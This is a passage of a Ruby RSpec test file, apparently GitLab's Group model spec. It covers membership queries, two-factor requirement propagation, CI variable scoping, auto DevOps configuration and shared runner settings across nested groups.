end
end
context 'invited members' do
let!(:member) { create(:group_member, :developer, :invited, group: group) }
it 'does not include such members in the result' do
expect(group.authorizable_members_with_parents).not_to include(member)
end
end
context 'members from group shares' do
let(:shared_group) { group }
let(:shared_with_group) { create(:group) }
before do
create(:group_group_link, shared_group: shared_group, shared_with_group: shared_with_group)
end
context 'an invited member that is part of the shared_with_group' do
let!(:member) { create(:group_member, :developer, :invited, group: shared_with_group) }
it 'does not include such members in the result' do
expect(shared_group.authorizable_members_with_parents).not_to(
include(member))
end
end
end
end
describe '#members_from_self_and_ancestors_with_effective_access_level' do
let!(:group_parent) { create(:group, :private) }
let!(:group) { create(:group, :private, parent: group_parent) }
let!(:group_child) { create(:group, :private, parent: group) }
let!(:user) { create(:user) }
let(:parent_group_access_level) { Gitlab::Access::REPORTER }
let(:group_access_level) { Gitlab::Access::DEVELOPER }
let(:child_group_access_level) { Gitlab::Access::MAINTAINER }
before do
create(:group_member, user: user, group: group_parent, access_level: parent_group_access_level)
create(:group_member, user: user, group: group, access_level: group_access_level)
create(:group_member, :minimal_access, user: create(:user), source: group)
create(:group_member, user: user, group: group_child, access_level: child_group_access_level)
end
it 'returns effective access level for user' do
expect(group_parent.members_from_self_and_ancestors_with_effective_access_level.as_json).to(
contain_exactly(
hash_including('user_id' => user.id, 'access_level' => parent_group_access_level)
)
)
expect(group.members_from_self_and_ancestors_with_effective_access_level.as_json).to(
contain_exactly(
hash_including('user_id' => user.id, 'access_level' => group_access_level)
)
)
expect(group_child.members_from_self_and_ancestors_with_effective_access_level.as_json).to(
contain_exactly(
hash_including('user_id' => user.id, 'access_level' => child_group_access_level)
)
)
end
end
context 'members-related methods' do
let!(:group) { create(:group, :nested) }
let!(:sub_group) { create(:group, parent: group) }
let!(:maintainer) { group.parent.add_user(create(:user), GroupMember::MAINTAINER) }
let!(:developer) { group.add_user(create(:user), GroupMember::DEVELOPER) }
let!(:other_developer) { group.add_user(create(:user), GroupMember::DEVELOPER) }
describe '#direct_and_indirect_members' do
it 'returns parents members' do
expect(group.direct_and_indirect_members).to include(developer)
expect(group.direct_and_indirect_members).to include(maintainer)
end
it 'returns descendant members' do
expect(group.direct_and_indirect_members).to include(other_developer)
end
end
describe '#direct_and_indirect_members_with_inactive' do
let!(:maintainer_blocked) { group.parent.add_user(create(:user, :blocked), GroupMember::MAINTAINER) }
it 'returns parents members' do
expect(group.direct_and_indirect_members_with_inactive).to include(developer)
expect(group.direct_and_indirect_members_with_inactive).to include(maintainer)
expect(group.direct_and_indirect_members_with_inactive).to include(maintainer_blocked)
end
it 'returns descendant members' do
expect(group.direct_and_indirect_members_with_inactive).to include(other_developer)
end
end
end
describe '#users_with_descendants' do
let(:user_a) { create(:user) }
let(:user_b) { create(:user) }
let(:group) { create(:group) }
let(:nested_group) { create(:group, parent: group) }
let(:deep_nested_group) { create(:group, parent: nested_group) }
it 'returns member users on every nest level without duplication' do
group.add_developer(user_a)
nested_group.add_developer(user_b)
deep_nested_group.add_maintainer(user_a)
expect(group.users_with_descendants).to contain_exactly(user_a, user_b)
expect(nested_group.users_with_descendants).to contain_exactly(user_a, user_b)
expect(deep_nested_group.users_with_descendants).to contain_exactly(user_a)
end
end
context 'user-related methods' do
let(:user_a) { create(:user) }
let(:user_b) { create(:user) }
let(:user_c) { create(:user) }
let(:user_d) { create(:user) }
let(:group) { create(:group) }
let(:nested_group) { create(:group, parent: group) }
let(:deep_nested_group) { create(:group, parent: nested_group) }
let(:project) { create(:project, namespace: group) }
before do
group.add_developer(user_a)
group.add_developer(user_c)
nested_group.add_developer(user_b)
deep_nested_group.add_developer(user_a)
project.add_developer(user_d)
end
describe '#direct_and_indirect_users' do
it 'returns member users on every nest level without duplication' do
expect(group.direct_and_indirect_users).to contain_exactly(user_a, user_b, user_c, user_d)
expect(nested_group.direct_and_indirect_users).to contain_exactly(user_a, user_b, user_c)
expect(deep_nested_group.direct_and_indirect_users).to contain_exactly(user_a, user_b, user_c)
end
it 'does not return members of projects belonging to ancestor groups' do
expect(nested_group.direct_and_indirect_users).not_to include(user_d)
end
end
describe '#direct_and_indirect_users_with_inactive' do
let(:user_blocked_1) { create(:user, :blocked) }
let(:user_blocked_2) { create(:user, :blocked) }
let(:user_blocked_3) { create(:user, :blocked) }
let(:project_in_group) { create(:project, namespace: nested_group) }
before do
group.add_developer(user_blocked_1)
nested_group.add_developer(user_blocked_1)
deep_nested_group.add_developer(user_blocked_2)
project_in_group.add_developer(user_blocked_3)
end
it 'returns member users on every nest level without duplication' do
expect(group.direct_and_indirect_users_with_inactive).to contain_exactly(user_a, user_b, user_c, user_d, user_blocked_1, user_blocked_2, user_blocked_3)
expect(nested_group.direct_and_indirect_users_with_inactive).to contain_exactly(user_a, user_b, user_c, user_blocked_1, user_blocked_2, user_blocked_3)
expect(deep_nested_group.direct_and_indirect_users_with_inactive).to contain_exactly(user_a, user_b, user_c, user_blocked_1, user_blocked_2)
end
it 'returns members of projects belonging to group' do
expect(nested_group.direct_and_indirect_users_with_inactive).to include(user_blocked_3)
end
end
end
describe '#project_users_with_descendants' do
let(:user_a) { create(:user) }
let(:user_b) { create(:user) }
let(:user_c) { create(:user) }
let(:group) { create(:group) }
let(:nested_group) { create(:group, parent: group) }
let(:deep_nested_group) { create(:group, parent: nested_group) }
let(:project_a) { create(:project, namespace: group) }
let(:project_b) { create(:project, namespace: nested_group) }
let(:project_c) { create(:project, namespace: deep_nested_group) }
it 'returns members of all projects in group and subgroups' do
project_a.add_developer(user_a)
project_b.add_developer(user_b)
project_c.add_developer(user_c)
expect(group.project_users_with_descendants).to contain_exactly(user_a, user_b, user_c)
expect(nested_group.project_users_with_descendants).to contain_exactly(user_b, user_c)
expect(deep_nested_group.project_users_with_descendants).to contain_exactly(user_c)
end
end
describe '#refresh_members_authorized_projects' do
let_it_be(:group) { create(:group, :nested) }
let_it_be(:parent_group_user) { create(:user) }
let_it_be(:group_user) { create(:user) }
before do
group.parent.add_maintainer(parent_group_user)
group.add_developer(group_user)
end
context 'users for which authorizations refresh is executed' do
it 'processes authorizations refresh for all members of the group' do
expect(UserProjectAccessChangedService).to receive(:new).with(contain_exactly(group_user.id, parent_group_user.id)).and_call_original
group.refresh_members_authorized_projects
end
context 'when explicitly specified to run only for direct members' do
it 'processes authorizations refresh only for direct members of the group' do
expect(UserProjectAccessChangedService).to receive(:new).with(contain_exactly(group_user.id)).and_call_original
group.refresh_members_authorized_projects(direct_members_only: true)
end
end
end
end
describe '#users_ids_of_direct_members' do
let_it_be(:group) { create(:group, :nested) }
let_it_be(:parent_group_user) { create(:user) }
let_it_be(:group_user) { create(:user) }
before do
group.parent.add_maintainer(parent_group_user)
group.add_developer(group_user)
end
it 'does not return user ids of the members of the parent' do
expect(group.users_ids_of_direct_members).not_to include(parent_group_user.id)
end
it 'returns the user ids of the direct member of the group' do
expect(group.users_ids_of_direct_members).to include(group_user.id)
end
context 'group sharing' do
let!(:shared_group) { create(:group) }
before do
create(:group_group_link, shared_group: shared_group, shared_with_group: group)
end
it 'does not return the user ids of members of the shared_with group' do
expect(shared_group.users_ids_of_direct_members).not_to(
include(group_user.id))
end
end
end
describe '#user_ids_for_project_authorizations' do
it 'returns the user IDs for which to refresh authorizations' do
maintainer = create(:user)
developer = create(:user)
group.add_user(maintainer, GroupMember::MAINTAINER)
group.add_user(developer, GroupMember::DEVELOPER)
expect(group.user_ids_for_project_authorizations)
.to include(maintainer.id, developer.id)
end
context 'group sharing' do
let_it_be(:group) { create(:group) }
let_it_be(:group_user) { create(:user) }
let_it_be(:shared_group) { create(:group) }
before do
group.add_developer(group_user)
create(:group_group_link, shared_group: shared_group, shared_with_group: group)
end
it 'returns the user IDs for shared with group members' do
expect(shared_group.user_ids_for_project_authorizations).to(
include(group_user.id))
end
end
context 'distinct user ids' do
let_it_be(:subgroup) { create(:group, :nested) }
let_it_be(:user) { create(:user) }
let_it_be(:shared_with_group) { create(:group) }
let_it_be(:other_subgroup_user) { create(:user) }
before do
create(:group_group_link, shared_group: subgroup, shared_with_group: shared_with_group)
subgroup.add_maintainer(other_subgroup_user)
# `user` is added as a direct member of the parent group, the subgroup
# and another group shared with the subgroup.
subgroup.parent.add_maintainer(user)
subgroup.add_developer(user)
shared_with_group.add_guest(user)
end
it 'returns only distinct user ids of users for which to refresh authorizations' do
expect(subgroup.user_ids_for_project_authorizations).to(
contain_exactly(user.id, other_subgroup_user.id))
end
end
end
describe '#update_two_factor_requirement' do
let(:user) { create(:user) }
context 'group membership' do
before do
group.add_user(user, GroupMember::OWNER)
end
it 'is called when require_two_factor_authentication is changed' do
expect_any_instance_of(User).to receive(:update_two_factor_requirement)
group.update!(require_two_factor_authentication: true)
end
it 'is called when two_factor_grace_period is changed' do
expect_any_instance_of(User).to receive(:update_two_factor_requirement)
group.update!(two_factor_grace_period: 23)
end
it 'is not called when other attributes are changed' do
expect_any_instance_of(User).not_to receive(:update_two_factor_requirement)
group.update!(description: 'foobar')
end
it 'calls #update_two_factor_requirement on each group member' do
other_user = create(:user)
group.add_user(other_user, GroupMember::OWNER)
calls = 0
allow_any_instance_of(User).to receive(:update_two_factor_requirement) do
calls += 1
end
group.update!(require_two_factor_authentication: true, two_factor_grace_period: 23)
expect(calls).to eq 2
end
end
context 'sub groups and projects' do
it 'enables two_factor_requirement for group member' do
group.add_user(user, GroupMember::OWNER)
group.update!(require_two_factor_authentication: true)
expect(user.reload.require_two_factor_authentication_from_group).to be_truthy
end
context 'expanded group members' do
let(:indirect_user) { create(:user) }
context 'two_factor_requirement is enabled' do
context 'two_factor_requirement is also enabled for ancestor group' do
it 'enables two_factor_requirement for subgroup member' do
subgroup = create(:group, :nested, parent: group)
subgroup.add_user(indirect_user, GroupMember::OWNER)
group.update!(require_two_factor_authentication: true)
expect(indirect_user.reload.require_two_factor_authentication_from_group).to be_truthy
end
end
context 'two_factor_requirement is disabled for ancestor group' do
it 'enables two_factor_requirement for subgroup member' do
subgroup = create(:group, :nested, parent: group, require_two_factor_authentication: true)
subgroup.add_user(indirect_user, GroupMember::OWNER)
group.update!(require_two_factor_authentication: false)
expect(indirect_user.reload.require_two_factor_authentication_from_group).to be_truthy
end
it 'enables two_factor_requirement for ancestor group member' do
ancestor_group = create(:group)
ancestor_group.add_user(indirect_user, GroupMember::OWNER)
group.update!(parent: ancestor_group)
group.update!(require_two_factor_authentication: true)
expect(indirect_user.reload.require_two_factor_authentication_from_group).to be_truthy
end
end
end
context 'two_factor_requirement is disabled' do
context 'two_factor_requirement is enabled for ancestor group' do
it 'enables two_factor_requirement for subgroup member' do
subgroup = create(:group, :nested, parent: group)
subgroup.add_user(indirect_user, GroupMember::OWNER)
group.update!(require_two_factor_authentication: true)
expect(indirect_user.reload.require_two_factor_authentication_from_group).to be_truthy
end
end
context 'two_factor_requirement is also disabled for ancestor group' do
it 'disables two_factor_requirement for subgroup member' do
subgroup = create(:group, :nested, parent: group)
subgroup.add_user(indirect_user, GroupMember::OWNER)
group.update!(require_two_factor_authentication: false)
expect(indirect_user.reload.require_two_factor_authentication_from_group).to be_falsey
end
it 'disables two_factor_requirement for ancestor group member' do
ancestor_group = create(:group, require_two_factor_authentication: false)
indirect_user.update!(require_two_factor_authentication_from_group: true)
ancestor_group.add_user(indirect_user, GroupMember::OWNER)
group.update!(require_two_factor_authentication: false)
expect(indirect_user.reload.require_two_factor_authentication_from_group).to be_falsey
end
end
end
end
context 'project members' do
it 'does not enable two_factor_requirement for child project member' do
project = create(:project, group: group)
project.add_maintainer(user)
group.update!(require_two_factor_authentication: true)
expect(user.reload.require_two_factor_authentication_from_group).to be_falsey
end
it 'does not enable two_factor_requirement for subgroup child project member' do
subgroup = create(:group, :nested, parent: group)
project = create(:project, group: subgroup)
project.add_maintainer(user)
group.update!(require_two_factor_authentication: true)
expect(user.reload.require_two_factor_authentication_from_group).to be_falsey
end
end
end
end
describe '#path_changed_hook' do
let(:system_hook_service) { SystemHooksService.new }
context 'for a new group' do
let(:group) { build(:group) }
before do
expect(group).to receive(:system_hook_service).and_return(system_hook_service)
end
it 'does not trigger system hook' do
expect(system_hook_service).to receive(:execute_hooks_for).with(group, :create)
group.save!
end
end
context 'for an existing group' do
let(:group) { create(:group, path: 'old-path') }
context 'when the path is changed' do
let(:new_path) { 'very-new-path' }
it 'triggers the rename system hook' do
expect(group).to receive(:system_hook_service).and_return(system_hook_service)
expect(system_hook_service).to receive(:execute_hooks_for).with(group, :rename)
group.update!(path: new_path)
end
end
context 'when the path is not changed' do
it 'does not trigger system hook' do
expect(group).not_to receive(:system_hook_service)
group.update!(name: 'new name')
end
end
end
end
describe '#ci_variables_for' do
let(:project) { create(:project, group: group) }
let(:environment_scope) { '*' }
let!(:ci_variable) do
create(:ci_group_variable, value: 'secret', group: group, environment_scope: environment_scope)
end
let!(:protected_variable) do
create(:ci_group_variable, :protected, value: 'protected', group: group)
end
subject { group.ci_variables_for('ref', project) }
it 'memoizes the result by ref and environment', :request_store do
scoped_variable = create(:ci_group_variable, value: 'secret', group: group, environment_scope: 'scoped')
expect(project).to receive(:protected_for?).with('ref').once.and_return(true)
expect(project).to receive(:protected_for?).with('other').twice.and_return(false)
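# Memoization is keyed by (ref, environment): ('ref', 'production') is
# resolved once across both iterations, while 'other' is looked up twice,
# once for each distinct environment key (nil and 'scoped').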
2.times do
expect(group.ci_variables_for('ref', project, environment: 'production')).to contain_exactly(ci_variable, protected_variable)
expect(group.ci_variables_for('other', project)).to contain_exactly(ci_variable)
expect(group.ci_variables_for('other', project, environment: 'scoped')).to contain_exactly(ci_variable, scoped_variable)
end
end
shared_examples 'ref is protected' do
it 'contains all the variables' do
is_expected.to contain_exactly(ci_variable, protected_variable)
end
end
context 'when the ref is not protected' do
before do
stub_application_setting(
default_branch_protection: Gitlab::Access::PROTECTION_NONE)
end
it 'contains only the CI variables' do
is_expected.to contain_exactly(ci_variable)
end
end
context 'when the ref is a protected branch' do
before do
allow(project).to receive(:protected_for?).with('ref').and_return(true)
end
it_behaves_like 'ref is protected'
end
context 'when the ref is a protected tag' do
before do
allow(project).to receive(:protected_for?).with('ref').and_return(true)
end
it_behaves_like 'ref is protected'
end
context 'when environment name is specified' do
let(:environment) { 'review/name' }
subject do
group.ci_variables_for('ref', project, environment: environment)
end
context 'when environment scope is exactly matched' do
let(:environment_scope) { 'review/name' }
it { is_expected.to contain_exactly(ci_variable) }
end
context 'when environment scope is matched by wildcard' do
let(:environment_scope) { 'review/*' }
it { is_expected.to contain_exactly(ci_variable) }
end
context 'when environment scope does not match' do
let(:environment_scope) { 'review/*/special' }
it { is_expected.not_to contain_exactly(ci_variable) }
end
context 'when environment scope has _' do
let(:environment_scope) { '*_*' }
it 'does not treat it as wildcard' do
is_expected.not_to contain_exactly(ci_variable)
end
context 'when environment name contains underscore' do
let(:environment) { 'foo_bar/test' }
let(:environment_scope) { 'foo_bar/*' }
it 'matches literally for _' do
is_expected.to contain_exactly(ci_variable)
end
end
end
# The environment name and scope cannot have % at the moment,
# but we're considering relaxing it and we should also make sure
# it doesn't break in case some data sneaked in somehow as we're
# not checking this integrity at the database level.
context 'when environment scope has %' do
it 'does not treat it as wildcard' do
ci_variable.update_attribute(:environment_scope, '*%*')
is_expected.not_to contain_exactly(ci_variable)
end
context 'when environment name contains a percent' do
let(:environment) { 'foo%bar/test' }
it 'matches literally for %' do
ci_variable.update(environment_scope: 'foo%bar/*')
is_expected.to contain_exactly(ci_variable)
end
end
end
context 'when variables with the same name have different environment scopes' do
let!(:partially_matched_variable) do
create(:ci_group_variable,
key: ci_variable.key,
value: 'partial',
environment_scope: 'review/*',
group: group)
end
let!(:perfectly_matched_variable) do
create(:ci_group_variable,
key: ci_variable.key,
value: 'perfect',
environment_scope: 'review/name',
group: group)
end
it 'puts variables matching environment scope more in the end' do
is_expected.to eq(
[ci_variable,
partially_matched_variable,
perfectly_matched_variable])
end
end
end
context 'when group has children' do
let(:group_child) { create(:group, parent: group) }
let(:group_child_2) { create(:group, parent: group_child) }
let(:group_child_3) { create(:group, parent: group_child_2) }
let(:variable_child) { create(:ci_group_variable, group: group_child) }
let(:variable_child_2) { create(:ci_group_variable, group: group_child_2) }
let(:variable_child_3) { create(:ci_group_variable, group: group_child_3) }
before do
allow(project).to receive(:protected_for?).with('ref').and_return(true)
end
context 'traversal queries' do
shared_examples 'correct ancestor order' do
it 'returns all variables belong to the group and parent groups' do
expected_array1 = [protected_variable, ci_variable]
expected_array2 = [variable_child, variable_child_2, variable_child_3]
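# Both ancestor-level variables belong to the same root group, so their
# relative order is not guaranteed; the first two are compared without
# order, then the descendant variables must appear in hierarchy order.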
got_array = group_child_3.ci_variables_for('ref', project).to_a
expect(got_array.shift(2)).to contain_exactly(*expected_array1)
expect(got_array).to eq(expected_array2)
end
end
context 'recursive' do
before do
stub_feature_flags(use_traversal_ids: false)
end
include_examples 'correct ancestor order'
end
context 'linear' do
before do
stub_feature_flags(use_traversal_ids: true)
group_child_3.reload # make sure traversal_ids are reloaded
end
include_examples 'correct ancestor order'
end
end
end
end
describe '#highest_group_member' do
let(:nested_group) { create(:group, parent: group) }
let(:nested_group_2) { create(:group, parent: nested_group) }
let(:user) { create(:user) }
subject(:highest_group_member) { nested_group_2.highest_group_member(user) }
context 'when the user is not a member of any group in the hierarchy' do
it 'returns nil' do
expect(highest_group_member).to be_nil
end
end
context 'when the user is only a member of one group in the hierarchy' do
before do
nested_group.add_developer(user)
end
it 'returns that group member' do
expect(highest_group_member.access_level).to eq(Gitlab::Access::DEVELOPER)
end
end
context 'when the user is a member of several groups in the hierarchy' do
before do
group.add_owner(user)
nested_group.add_developer(user)
nested_group_2.add_maintainer(user)
end
it 'returns the group member with the highest access level' do
expect(highest_group_member.access_level).to eq(Gitlab::Access::OWNER)
end
end
end
describe '#related_group_ids' do
let(:nested_group) { create(:group, parent: group) }
let(:shared_with_group) { create(:group, parent: group) }
before do
create(:group_group_link, shared_group: nested_group,
shared_with_group: shared_with_group)
end
subject(:related_group_ids) { nested_group.related_group_ids }
it 'returns id' do
expect(related_group_ids).to include(nested_group.id)
end
it 'returns ancestor id' do
expect(related_group_ids).to include(group.id)
end
it 'returns shared with group id' do
expect(related_group_ids).to include(shared_with_group.id)
end
context 'with more than one ancestor group' do
let(:ancestor_group) { create(:group) }
before do
group.update(parent: ancestor_group)
end
it 'returns all ancestor group ids' do
expect(related_group_ids).to(
include(group.id, ancestor_group.id))
end
end
context 'with more than one shared with group' do
let(:another_shared_with_group) { create(:group, parent: group) }
before do
create(:group_group_link, shared_group: nested_group,
shared_with_group: another_shared_with_group)
end
it 'returns all shared with group ids' do
expect(related_group_ids).to(
include(shared_with_group.id, another_shared_with_group.id))
end
end
end
context 'with uploads' do
it_behaves_like 'model with uploads', true do
let(:model_object) { create(:group, :with_avatar) }
let(:upload_attribute) { :avatar }
let(:uploader_class) { AttachmentUploader }
end
end
describe '#first_auto_devops_config' do
using RSpec::Parameterized::TableSyntax
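# `where` (from rspec-parameterized) declares a table of inputs; each row is
# exercised by the `with_them` block further down.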
let(:group) { create(:group) }
subject { group.first_auto_devops_config }
where(:instance_value, :group_value, :config) do
# Instance level enabled
true | nil | { status: true, scope: :instance }
true | true | { status: true, scope: :group }
true | false | { status: false, scope: :group }
# Instance level disabled
false | nil | { status: false, scope: :instance }
false | true | { status: true, scope: :group }
false | false | { status: false, scope: :group }
end
with_them do
before do
stub_application_setting(auto_devops_enabled: instance_value)
group.update_attribute(:auto_devops_enabled, group_value)
end
it { is_expected.to eq(config) }
end
context 'with parent groups' do
where(:instance_value, :parent_value, :group_value, :config) do
# Instance level enabled
true | nil | nil | { status: true, scope: :instance }
true | nil | true | { status: true, scope: :group }
true | nil | false | { status: false, scope: :group }
true | true | nil | { status: true, scope: :group }
true | true | true | { status: true, scope: :group }
true | true | false | { status: false, scope: :group }
true | false | nil | { status: false, scope: :group }
true | false | true | { status: true, scope: :group }
true | false | false | { status: false, scope: :group }
# Instance level disabled
false | nil | nil | { status: false, scope: :instance }
false | nil | true | { status: true, scope: :group }
false | nil | false | { status: false, scope: :group }
false | true | nil | { status: true, scope: :group }
false | true | true | { status: true, scope: :group }
false | true | false | { status: false, scope: :group }
false | false | nil | { status: false, scope: :group }
false | false | true | { status: true, scope: :group }
false | false | false | { status: false, scope: :group }
end
with_them do
before do
stub_application_setting(auto_devops_enabled: instance_value)
parent = create(:group, auto_devops_enabled: parent_value)
group.update!(
auto_devops_enabled: group_value,
parent: parent
)
end
it { is_expected.to eq(config) }
end
end
end
describe '#auto_devops_enabled?' do
subject { group.auto_devops_enabled? }
context 'when auto devops is explicitly enabled on group' do
let(:group) { create(:group, :auto_devops_enabled) }
it { is_expected.to be_truthy }
end
context 'when auto devops is explicitly disabled on group' do
let(:group) { create(:group, :auto_devops_disabled) }
it { is_expected.to be_falsy }
end
context 'when auto devops is implicitly enabled or disabled' do
before do
stub_application_setting(auto_devops_enabled: false)
group.update!(parent: parent_group)
end
context 'when auto devops is enabled on root group' do
let(:root_group) { create(:group, :auto_devops_enabled) }
let(:subgroup) { create(:group, parent: root_group) }
let(:parent_group) { create(:group, parent: subgroup) }
it { is_expected.to be_truthy }
end
context 'when auto devops is disabled on root group' do
let(:root_group) { create(:group, :auto_devops_disabled) }
let(:subgroup) { create(:group, parent: root_group) }
let(:parent_group) { create(:group, parent: subgroup) }
it { is_expected.to be_falsy }
end
context 'when auto devops is disabled on parent group and enabled on root group' do
let(:root_group) { create(:group, :auto_devops_enabled) }
let(:parent_group) { create(:group, :auto_devops_disabled, parent: root_group) }
it { is_expected.to be_falsy }
end
end
end
describe 'project_creation_level' do
it 'outputs the default one if it is nil' do
group = create(:group, project_creation_level: nil)
expect(group.project_creation_level).to eq(Gitlab::CurrentSettings.default_project_creation)
end
end
describe 'subgroup_creation_level' do
it 'defaults to maintainers' do
expect(group.subgroup_creation_level)
.to eq(Gitlab::Access::MAINTAINER_SUBGROUP_ACCESS)
end
end
describe '#access_request_approvers_to_be_notified' do
let_it_be(:group) { create(:group, :public) }
it 'returns a maximum of ten owners of the group in recent_sign_in descending order' do
limit = 2
stub_const("Member::ACCESS_REQUEST_APPROVERS_TO_BE_NOTIFIED_LIMIT", limit)
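# The real limit is 10 (hence "ten" in the example description); stubbing
# it down to 2 keeps the test cheap while still exercising the cut-off.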
users = create_list(:user, limit + 1, :with_sign_ins)
active_owners = users.map do |user|
create(:group_member, :owner, group: group, user: user)
end
active_owners_in_recent_sign_in_desc_order = group.members_and_requesters
.id_in(active_owners)
.order_recent_sign_in.limit(limit)
expect(group.access_request_approvers_to_be_notified).to eq(active_owners_in_recent_sign_in_desc_order)
end
it 'returns active, non_invited, non_requested owners of the group' do
owner = create(:group_member, :owner, source: group)
create(:group_member, :maintainer, group: group)
create(:group_member, :owner, :invited, group: group)
create(:group_member, :owner, :access_request, group: group)
create(:group_member, :owner, :blocked, group: group)
expect(group.access_request_approvers_to_be_notified.to_a).to eq([owner])
end
end
describe '.groups_including_descendants_by' do
let_it_be(:parent_group1) { create(:group) }
let_it_be(:parent_group2) { create(:group) }
let_it_be(:extra_group) { create(:group) }
let_it_be(:child_group1) { create(:group, parent: parent_group1) }
let_it_be(:child_group2) { create(:group, parent: parent_group1) }
let_it_be(:child_group3) { create(:group, parent: parent_group2) }
subject { described_class.groups_including_descendants_by([parent_group2.id, parent_group1.id]) }
shared_examples 'returns the expected groups for a group and its descendants' do
specify { is_expected.to contain_exactly(parent_group1, parent_group2, child_group1, child_group2, child_group3) }
end
it_behaves_like 'returns the expected groups for a group and its descendants'
context 'when :linear_group_including_descendants_by feature flag is disabled' do
before do
stub_feature_flags(linear_group_including_descendants_by: false)
end
it_behaves_like 'returns the expected groups for a group and its descendants'
end
end
describe '.preset_root_ancestor_for' do
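# preset_root_ancestor_for pre-populates the memoized root ancestor on every
# given group so later `root_ancestor` calls avoid `self_and_ancestors`
# queries, which is what the negative message expectations verify.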
let_it_be(:rootgroup, reload: true) { create(:group) }
let_it_be(:subgroup, reload: true) { create(:group, parent: rootgroup) }
let_it_be(:subgroup2, reload: true) { create(:group, parent: subgroup) }
it 'does nothing for a single group' do
expect(subgroup).not_to receive(:self_and_ancestors)
described_class.preset_root_ancestor_for([subgroup])
end
it 'sets the same root_ancestor for multiple groups' do
expect(subgroup).not_to receive(:self_and_ancestors)
expect(subgroup2).not_to receive(:self_and_ancestors)
described_class.preset_root_ancestor_for([rootgroup, subgroup, subgroup2])
expect(subgroup.root_ancestor).to eq(rootgroup)
expect(subgroup2.root_ancestor).to eq(rootgroup)
end
end
describe '#update_shared_runners_setting!' do
context 'enabled' do
subject { group.update_shared_runners_setting!('enabled') }
context 'group that its ancestors have shared runners disabled' do
let_it_be(:parent, reload: true) { create(:group, :shared_runners_disabled) }
let_it_be(:group, reload: true) { create(:group, :shared_runners_disabled, parent: parent) }
let_it_be(:project, reload: true) { create(:project, shared_runners_enabled: false, group: group) }
it 'raises exception' do
expect { subject }
.to raise_error(ActiveRecord::RecordInvalid, 'Validation failed: Shared runners enabled cannot be enabled because parent group has shared Runners disabled')
end
it 'does not enable shared runners' do
expect do
subject rescue nil
parent.reload
group.reload
project.reload
end.to not_change { parent.shared_runners_enabled }
.and not_change { group.shared_runners_enabled }
.and not_change { project.shared_runners_enabled }
end
end
context 'root group with shared runners disabled' do
let_it_be(:group) { create(:group, :shared_runners_disabled) }
let_it_be(:sub_group) { create(:group, :shared_runners_disabled, parent: group) }
let_it_be(:project) { create(:project, shared_runners_enabled: false, group: sub_group) }
it 'enables shared Runners only for itself' do
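# subject_and_reload is a small helper (defined elsewhere in this spec,
# presumably evaluating the subject and reloading the given records) so the
# `change` matchers observe the persisted values.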
expect { subject_and_reload(group, sub_group, project) }
.to change { group.shared_runners_enabled }.from(false).to(true)
.and not_change { sub_group.shared_runners_enabled }
.and not_change { project.shared_runners_enabled }
end
end
end
context 'disabled_and_unoverridable' do
let_it_be(:group) { create(:group) }
let_it_be(:sub_group) { create(:group, :shared_runners_disabled, :allow_descendants_override_disabled_shared_runners, parent: group) }
let_it_be(:sub_group_2) { create(:group, parent: group) }
let_it_be(:project) { create(:project, group: group, shared_runners_enabled: true) }
let_it_be(:project_2) { create(:project, group: sub_group_2, shared_runners_enabled: true) }
subject { group.update_shared_runners_setting!('disabled_and_unoverridable') }
it 'disables shared Runners for all descendant groups and projects' do
expect { subject_and_reload(group, sub_group, sub_group_2, project, project_2) }
.to change { group.shared_runners_enabled }.from(true).to(false)
.and not_change { group.allow_descendants_override_disabled_shared_runners }
.and not_change { sub_group.shared_runners_enabled }
.and change { sub_group.allow_descendants_override_disabled_shared_runners }.from(true).to(false)
.and change { sub_group_2.shared_runners_enabled }.from(true).to(false)
.and not_change { sub_group_2.allow_descendants_override_disabled_shared_runners }
.and change { project.shared_runners_enabled }.from(true).to(false)
.and change { project_2.shared_runners_enabled }.from(true).to(false)
end
context 'with override on self' do
let_it_be(:group) { create(:group, :shared_runners_disabled, :allow_descendants_override_disabled_shared_runners) }
it 'disables it' do
expect { subject_and_reload(group) }
.to not_change { group.shared_runners_enabled }
.and change { group.allow_descendants_override_disabled_shared_runners }.from(true).to(false)
end
end
end
context 'disabled_with_override' do
subject { group.update_shared_runners_setting!('disabled_with_override') }
context 'top level group' do
let_it_be(:group) { create(:group, :shared_runners_disabled) }
let_it_be(:sub_group) { create(:group, :shared_runners_disabled, parent: group) }
let_it_be(:project) { create(:project, shared_runners_enabled: false, group: sub_group) }
it 'enables allow descendants to override only for itself' do
expect { subject_and_reload(group, sub_group, project) }
.to change { group.allow_descendants_override_disabled_shared_runners }.from(false).to(true)
.and not_change { group.shared_runners_enabled }
.and not_change { sub_group.allow_descendants_override_disabled_shared_runners }
.and not_change { sub_group.shared_runners_enabled }
.and not_change { project.shared_runners_enabled }
end
end
context 'group that its ancestors have shared Runners disabled but allows to override' do
let_it_be(:parent) { create(:group, :shared_runners_disabled, :allow_descendants_override_disabled_shared_runners) }
let_it_be(:group) { create(:group, :shared_runners_disabled, parent: parent) }
let_it_be(:project) { create(:project, shared_runners_enabled: false, group: group) }
it 'enables allow descendants to override' do
expect { subject_and_reload(parent, group, project) }
.to not_change { parent.allow_descendants_override_disabled_shared_runners }
.and not_change { parent.shared_runners_enabled }
.and change { group.allow_descendants_override_disabled_shared_runners }.from(false).to(true)
.and not_change { group.shared_runners_enabled }
.and not_change { project.shared_runners_enabled }
end
end
context 'when parent does not allow' do
let_it_be(:parent, reload: true) { create(:group, :shared_runners_disabled, allow_descendants_override_disabled_shared_runners: false) }
let_it_be(:group, reload: true) { create(:group, :shared_runners_disabled, allow_descendants_override_disabled_shared_runners: false, parent: parent) }
it 'raises exception' do
expect { subject }
.to raise_error(ActiveRecord::RecordInvalid, 'Validation failed: Allow descendants override disabled shared runners cannot be enabled because parent group does not allow it')
end
it 'does not allow descendants to override' do
expect do
subject rescue nil
parent.reload
group.reload
end.to not_change { parent.allow_descendants_override_disabled_shared_runners }
.and not_change { parent.shared_runners_enabled }
.and not_change { group.allow_descendants_override_disabled_shared_runners }
.and not_change { group.shared_runners_enabled }
end
end
context 'top level group that has shared Runners enabled' do
let_it_be(:group) { create(:group, shared_runners_enabled: true) }
let_it_be(:sub_group) { create(:group, shared_runners_enabled: true, parent: group) }
let_it_be(:project) { create(:project, shared_runners_enabled: true, group: sub_group) }
it 'enables allow descendants to override & disables shared runners everywhere' do
expect { subject_and_reload(group, sub_group, project) }
.to change { group.shared_runners_enabled }.from(true).to(false)
.and change { group.allow_descendants_override_disabled_shared_runners }.from(false).to(true)
.and change { sub_group.shared_runners_enabled }.from(true).to(false)
.and change { project.shared_runners_enabled }.from(true).to(false)
end
end
end
end
describe "#default_branch_name" do
context "when group.namespace_settings does not have a default branch name" do
it "returns nil" do
